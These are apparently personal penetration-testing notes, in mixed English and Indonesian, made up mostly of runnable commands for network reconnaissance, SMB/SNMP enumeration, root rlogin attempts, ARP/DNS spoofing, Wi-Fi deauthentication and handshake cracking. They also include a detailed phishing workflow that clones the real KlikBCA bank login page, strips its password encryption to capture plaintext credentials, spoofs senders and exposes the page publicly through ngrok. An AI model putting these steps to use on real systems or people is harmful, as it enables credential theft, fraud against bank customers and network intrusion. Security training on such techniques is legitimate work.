- Use Maltego to perform OSINT investigation and analysis: "People Interest".
- Using Burp Suite to poking around, understand app's logic & functionalities, observe all HTTP reqs & resps, attack surface mapping.
- Goals: Understand all access points / attack surfaces & functionalities of the system (HTTP headers, parameters, cookies, APIs, technology, usage/patterns, etc).
- Only Ping Scan to search live hosts, disables port scanning. Choose the target that suited scopes.
nmap 192.168.100.0/24 -sn
nmap 192.168.100.* -sn - Scan Top 10 TCP Ports
nmap 192.168.100.31 --top-ports=10- Fast mode, only scan 100 most common ports
nmap -F -v 192.168.100.31 - Normal-scan, scan 1000 most common ports
nmap -v 192.168.100.31 - Scan all 65535 TCP ports
nmap -p- 192.168.100.31- Operating System (OS) Enumeration. For optimation & efficiency use -Pn to disable ICMP/Ping scan. -n disable dns resolution.
sudo nmap -O 192.168.100.31 -Pn -n- Service Version Detection. Enumerate all services & their version. For optimation & efficiency use -Pn to disable ICMP/Ping scan. -n disable dns resolution.
nmap -p- -v -sV -Pn -n 192.168.100.31- Banner Grabbing. Grab banner of an open port.
nc -nv 192.168.100.31 21
nc -nv 192.168.100.31 80
nmap -sV --script=banner -p21 10.10.10.0/24- Remote Shell (RSH) service on Default Port 514
rsh -l root 192.168.100.31- Remote Login Service (rlogin) on Default Port 513
rlogin -l root 192.168.100.31
msf > search rlogin
msf > use auxiliary/scanner/rservices/rlogin_login
msf auxiliary (scanner/rservices/rlogin_login) > set rhosts 192.168.100.31
msf auxiliary (scanner/rservices/rlogin_login) > set username root
msf auxiliary (scanner/rservices/rlogin_login) > exploit- HTTP service enumeration on an IP
nmap --script=http-enum 192.168.100.31 -p80,8081- FTP service enumeration
nmap -sC -sV -p21 192.168.100.31
ftp -p 192.168.100.31- SMB service enumeration
nmap --script smb-os-discovery.nse -p445 192.168.100.31
nmap -A -p445 192.168.100.31- List SMB Shares
smbclient -N -L \\\\192.168.100.31- Connect to an SMB share
smbclient \\\\192.168.100.31\\users
ls
NT_STATUS_ACCESS_DENIED listing \*
exit
smbclient -U bob \\\\192.168.100.31\\users- SNMP service enumeration
snmpwalk -v 2c -c public 192.168.100.31 1.3.6.1.2.1.1.5.0
snmpwalk -v 2c -c private 192.168.100.31- Brute force SNMP secret string
onesixtyone -c dict.txt 192.168.100.31- Default Nmap Scripting Engine (NSE) Scanning
# Default: -sC or --script=default
nmap -sC 192.168.100.31
# Script ONLY run based on the port states found by the scan
nmap -sC -p445 192.168.100.31
# To run specific script or category
nmap --script=http-enum -p80 192.168.100.31
nmap --script=http-* -p80 192.168.100.31
nmap --script=banner -p22,23 192.168.100.31
# Aggressive Scan - Performs service detection, OS detection, traceroute and uses defaults scripts to scan the target.
nmap -p 80 -A 192.168.100.31- Nmap Scripting Engine (NSE) - Vuln Category
# NSE location
ls /usr/share/nmap/scripts
# Uses all related scripts from vuln category to see what vulnerabilities we can find
nmap -p 80 -sV --script vuln 192.168.100.31
# Uses specific vuln script
nmap -p 21 -sV --script ftp-vsftpd-backdoor 192.168.100.31- Attacking the User. The art of Human Hacking. Using SET and GoPhish.
# The Social-Engineering Toolkit (SET)
## Credential Harvester Attack
sudo setoolkit
set> 1) Social-Engineering Attacks
set> 2) Website Attack Vectors
set> 3) Credential Harvester Attack Method
# Case 0: Just use default SET template like Google web phising
set> 1) Web Templates
set> IP address listener: your-kali-ip
set> 2. Google
# Case 1: No config
set> 2) Site Cloner
set> IP Address listener: your-kali-ip
set> Enter the url to clone: http://testphp.vulnweb.com/login.php
# Case 2: Perlu Config ubah web server ke apache agar dapat mengubah file web phising di default path /var/www/html/
sudo sed -i 's/^APACHE_SERVER=OFF/APACHE_SERVER=ON/' /etc/setoolkit/set.config
set> 2) Site Cloner
set> IP Address listener: your-kali-ip
set> Enter the url to clone: https://ibank.klikbca.com- Simulasi Phishing Email (Phishing Assessment). Syarat: Harus sudah aktifkan 2FA di akun google utk bisa gunakan SMTP service google utk kirim email phishing.
# Step to Setup MFA on Google and gain SMTP password
- buka google, klik pojok kanan atas
- klik "Manage your Google Account > Security > 2-Step Verification > Add phone number / Authenticator"
# Step to get Google SMTP Service Password
- buka: https://myaccount.google.com/apppasswords
- isi nama aplikasi, copy password utk digunakan sebagai pass SMTP.# Phishing Assessment using SET: Mass Mailer Attack
# NOTE: TERAKHIR COBA UDAH GA BISA, KAYAKNYA FILE CONTENT KOSONG PUN (BUKAN MALWARE) TETAP DI BLOCK GOOGLE, SKIP DULU.
touch /home/kali/update.exe
sudo setoolkit
set> 1) Social-Engineering Attacks
set> 5) Mass Mailer Attack
set> 1. E-Mail Attack Single Email Address
set> 1. Pre-Defined Template
set> 1. New Update
set> Send Email to: [email protected]
set> 1. Use a gmail Account for your email attack.
set> Your gmail email address: [email protected]
set:phishing> The FROM NAME the user will see: Administrator
Email password:
set:phishing> Flag this message/s as high priority? [yes|no]: no
Do you want to attach a file - [y/n]: y
The path of file: /home/kali/update.exe
Do you want to attach an inline file - [y/n]: n
[*] SET has finished sending the emails
# Phising Assessment using GoPhish
## If using Kali Linux:
sudo sed -i -e "s/127\.0\.0\.1:3333/0\.0\.0\.0:3333/g" /etc/gophish/config.json
gophish
# open the web UI on port https://your-kali-linux-ip:3333
https://192.168.56.16:3333/
# Default credentials:
# Username: admin
# Password: kali-gophish
# Untuk matiin: gophish-stop
## If using other Linux distro:
mkdir gophish && cd gophish
wget --no-check-certificate -O gophish.zip https://github.com/gophish/gophish/releases/download/v0.12.1/gophish-v0.12.1-linux-64bit.zip
sudo apt install -y unzip
unzip gophish.zip && rm gophish.zip
sed -i -e "s/127\.0\.0\.1:3333/0\.0\.0\.0:3333/g" config.json
chmod +x gophish
./gophish
# Browse to https://localhost:3333
# See the logs for default credentials
# Jika setelah jalanin Gophish => Unable to connect? pastikan port 80 gak dipake service lain (open), cek pake nmap:
nmap -p80 -sV localhost
# jika dipake (open), cek service mana yg make, terus matiin. Misal dipake Apache2:
service apache2 stop
- Sending Profiles
# Name: Gmai SMTP Server
# SMTP From: [email protected]
# Host: smtp.gmail.com:587
# Username: [email protected]
- Landing Pages
# Import Site: https://ibank.klikbca.com
# Ubah script bagian var enkrip hilangkan enkripsi agar password ketangkep plain text:
var enkrip = document.getElementById("txt_pswd").value;
# Centang Capture Submitted Data & Capture Passwords
# Redirect to: https://ibank.klikbca.com
- Email Templates
# Create Email Template (KlikBCA) using Grok AI, contoh prompt: "create gophish email templates for klikbca.com phising campaign"
# contoh: https://x.com/i/grok/share/9E14wo6WaBOuBOicnoiJjjFzR
# Name: KlikBCA Account Security Verification
# Envelope Sender: KlikBCA <[email protected]>
# Subject: Verifikasi Keamanan Akun KlikBCA Anda
# Ubah script sesuaikan bagian logo:
<img src="https://www.klikbca.com/images/top_BCA1.jpg" alt="KlikBCA Logo" width="150">
# Contoh 2 dari Import Email:
# pilih salah satu email Google subject "Notifikasi keamanan"
# klik kanan emailnya > "Tampilkan versi asli" > Copy to clipboard
# Name: Import Email
# Klik "Import Email" > Paste clipboard
# Envelope Sender: Google <[email protected]>
# Subject: Notifikasi keamanan
- Users & Groups
# Add New Group, Enter victims email and prticular infos.
- Campaigns
# New Campaign
# Name: KlikBCA Campaign
# Attacker / Gophish Server URL (use HTTP not HTTPS!): http://192.168.88.132
# Sending Profile: Gmail SMTP Server - Simulasi Email Spoofing pada Phishing Assessment (GoPhish + MailHog)
mkdir mailhog && cd mailhog
wget https://github.com/mailhog/MailHog/releases/download/v1.0.1/MailHog_linux_amd64
chmod +x MailHog_linux_amd64
sudo ./MailHog_linux_amd64
# Mail Inbox: http://localhost:8025/
# The new SMTP port: 1025
# Change Config on GoPhish:
- Edit Sending Profile
# SMTP From: KlikBCA <[email protected]>
# Host: localhost:1025
# Username & Pass: kosongin
- Edit Email Template
# Envelope sender: KlikBCA <[email protected]>
- Launch New Campaign!
- [ ] (Bonus) Using Ngrok for expose localhost to internet
# Signup & Download: ngrok.com
mkdir ngrok && cd ngrok
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
sudo tar -xvzf ngrok-v3-stable-linux-amd64.tgz -C /usr/local/bin
ngrok config add-authtoken {{YOUR-AUTH-TOKEN}}
ngrok http http://localhost
# Ganti di GoPhish > New Campaign > URL: generated by ngorok, contoh: https://158a-2001-448a-1001-64ec-9c37-ff83-d99e-ad3.ngrok-free.app
-
System Hacking using Metasploit
-
Web Hacking Using Burp Suite
- Wireless Hacking: Setup Driver & Quick Win using Wifite
# Setup Wireless External Adapter
# Setting virtualbox
Setting -> USB -> USB 2.0
# Check the adapter
(On Virtualbox: Device -> USB -> Check Adapter)
lsusb
ip link
ip a
iwconfig
# update repo dulu
sudo apt update
# If apt update error on signature verification (https://forums.kali.org/t/apt-update-gpg-missing-key-error/7563), do this: sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
# Install driver & reboot for TP-Link TL-WN722N v2/v3 [Realtek RTL8188EUS] (v1 gak perlu install driver)
# Driver agar bisa monitor mode dan packet injection
sudo apt install -y realtek-rtl8188eus-dkms
reboot
# Set the adapter into Monitor Mode
sudo ifconfig wlan0 down
sudo iw wlan0 set monitor control
sudo ifconfig wlan0 up
iwconfig
# Mengembalikan ke Managed Mode
sudo ifconfig wlan0 down
sudo iwconfig wlan0 mode managed
sudo ifconfig wlan0 up
# Test Packet Capture and see on wireshark
Open Wireshark
sudo aireplay-ng --test wlan0
## See is there any traffics indicator there on wlan0? If there is no one (0) packet that captured/injected by aireplay-ng, theres an error on wifi devices. Just uncheck & check again (On Virtualbox: Device -> USB -> Uncheck & Re-check Adapter)
# If there is ONLY a problem with process, just check & kill interfering process:
sudo airmon-ng check
sudo airmon-ng check kill
# Wifite akan captures semua yg baru join login wifi dan yang re-join karna ketendang otomatis (de-auth attacks) akan tercapture secara otomatis pada file .pcap nya.
sudo wifite --kill- Network Hacking: The Classic MITM (ARP & DNS Spoofing) using Ettercap & Wireshark
# MITM requirement: Hidupkan ip_forward untuk wireshark agar bisa meng-forward packet yg dicapture
cat /proc/sys/net/ipv4/ip_forward
sudo su
echo 1 > /proc/sys/net/ipv4/ip_forward
# ARP Spoofing with Ettercap
open ettercap GUI
pilih interface target > klik Accept for unified sniffing
klik scan hosts
Add Target 1 (victim), add Target 2 (router/default gateway)
klik MITM Menu > ARP poisoning
Open Wireshark to see packets captured or not
# POST request credentials harvesting in wireshark
# test login on http web login, jika error setelah submit ulang kembali
# cek di wireshark dengan filter:
http.request.method==POST
# DNS spoofing requirements:
Siapkan website phising misal fake google site dengan setoolkit
# Ubah konfigurasi ettercap agar bisa spoof dns, isi dengan ip dimana fake google site running (attacker)
sudo mousepad /etc/ettercap/etter.conf
# Ganti jadi 0 dua baris berikut
ec_uid = 0 # nobody is the default
ec_gid = 0 # nobody is the default
# Uncomment redir_command_* dan IPv6 pada baris:
#---------------
# Linux
#---------------
sudo mousepad /etc/ettercap/etter.dns
google.com A 192.168.100.1
*.google.com A 192.168.100.9
# Launch DNS Spoofing/Poisoning with Ettercap GUI
open ettercap GUI
pilih interface target > klik Accept for start unified sniffing
Stop unified sniffing
klik scan hosts
Add Target 1 (router/default gateway), add Target 2 (victim)
klik MITM Menu > ARP poisoning
klik Plugins > Manage plugins > check dns_spoof
Start unified sniffing
# If crash, just use Ettercap CLI alternative to perform dns spoofing:
sudo ettercap -T -q -i eth1 -M arp:remote /192.168.100.1// /192.168.100.9// -P dns_spoof
# Flush DNS on cmd:
ipconfig /flushdns- Wireless Hacking: Thre Classic Wi-Fi Attacks using Aircrack-NG suites
# Airmon-NG 101
# Start monitoring mode using airmon-ng
sudo airmon-ng start wlan0
iwconfig
# Test Packet Capture and see on wireshark
Open Wireshark
sudo aireplay-ng --test wlan0
## See is there any traffics indicator there on wlan0? If there is no one (0) packet that captured/injected by aireplay-ng, theres an error on wifi devices. Just uncheck & check again (On Virtualbox: Device -> USB -> Uncheck & Re-check Adapter)
# If there is ONLY a problem with process, just check & kill interfering process:
sudo airmon-ng check
sudo airmon-ng check kill
# Scan on-demand / live capturing all the wireless access points using airodump-ng and note the "channel" of BSSID target
sudo airodump-ng wlan0
# Scan wireless && save output to file with prefix name: "cyber", including .pcap file to crack.
## -c = channel of the Access Point / BSSID target, to narrow down traffic capture. -w = prefix name of captured file (.pcap)
sudo airodump-ng wlan0 -c 11 -w cyber
## De-auth attack to force victim re-join and capture the EOPL (4-way handshake) to then crack with aircrack-ng.
## --deauth 5 = the number of deauths to send, -a = Access Point / BSSID target, -c = MAC address of client that will be de-auth attacked
sudo aireplay-ng --deauth 5 -a DA:CF:DB:29:F7:7E -c E8:B1:FC:F3:AF:20 wlan0
# Crack the .pcap file from airodump-ng
aircrack-ng cyber-01.cap -w /usr/share/wordlists/wifite.txt- Privilege Escalation
- Reporting and Mitigation